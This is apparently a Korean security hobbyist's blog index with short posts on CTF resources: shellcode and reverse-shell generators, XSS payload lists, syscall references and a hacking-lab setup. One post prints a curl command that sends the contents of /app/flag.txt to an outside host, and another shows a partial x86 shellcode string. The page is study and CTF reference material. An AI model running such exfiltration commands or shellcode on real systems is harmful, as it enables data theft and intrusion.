NOTE7 Github education plan requests 승인 방법 In korea univ 삽질 안하려고 메모: github education 혜택을 받기 위해서는 아래 링크에 학교 이메일과 학생증/재학증명서를 요구한다. https://education.github.com/discount_requests/application GitHub: Let’s build from here GitHub is where over 100 million developers shape the future of software, together. Contribute to the open source community, manage your Git repositories, review code like a pro, track bugs and fea... github.com 그런데, 내 경우에는 서류가 9번 리젝되었고.. 2024. 3. 5. ascii art ctf 출제하다가 찾은 사이트 들 https://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20 https://ascii.co.uk/art https://asky.lol https://www.ascii-art-generator.org https://fsymbols.com/text-art/ Text to ASCII Art Generator (TAAG) patorjk.com 2024. 1. 25. shellcode generator, db https://masterccc.github.io/tools/shellcode_gen/ /bin/cat Shellcode generator /bin/cat [your_file] Shellcode generator for intel x86 File name to read : Generate This is your shellcode : \x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc masterccc.github.io https://github.com/secnnet/Shellcode-Genera.. 2024. 1. 25. syscall https://syscall.sh/ Linux System Calls quick and easy Linux System Calls and Call Conventions for most architechtures syscall.sh 편함 2024. 1. 25. XSS payload https://tinyxss.terjanq.me Tiny XSS Payloads Tiny XSS Payloads Features available Payloads tinyxss.terjanq.me 짧은거 모음 https://github.com/payloadbox/xss-payload-list GitHub - payloadbox/xss-payload-list: 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List - GitHub - payloadbox/xss-payload-list: 🎯 Cross Site Scripting ( XSS ) Vulnerabi.. 2024. 1. 25. reverse shell, curl bash perl ETC... https://www.revshells.com/ Online - Reverse Shell Generator Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs. www.revshells.com 편하게 리버스 쉘 커맨드 만들 수 있음 curl -X POST -d "data=$(cat /app/flag.txt)" https://dongha.xyz/ 2024. 1. 25. 해킹환경 셋팅 초기화 할 때 마다 설정하는 내용이기도 하고, 공유해달라는 요청도 많아서 정리하는 포스트 1. windows 리눅스는 WSL을 기본으로 사용함 vmware workstation으로 우분투 22, kali, win7 정도 사용함 디컴,디버거는 IDA 32/64 Xdebuger 32/64 windbg gdb(linux) 많이 사용함 2.mac parallels로 윈도우, 우분투 올려둠 ( m3pro 사용 중이라 거의 의미없음 ) lldb, gdb(linux) 많이 사용함 cutter랑 ida 사용함 terminus -> ssh 사용할 때 너무 편함 iterm -> rosetta2로 열기 설정해서 x86 arch로 두고 씀 text scanner -> command + 1 눌러서 OCR 하는 프로그램인데 저렴.. 2024. 1. 25. 이전 1 다음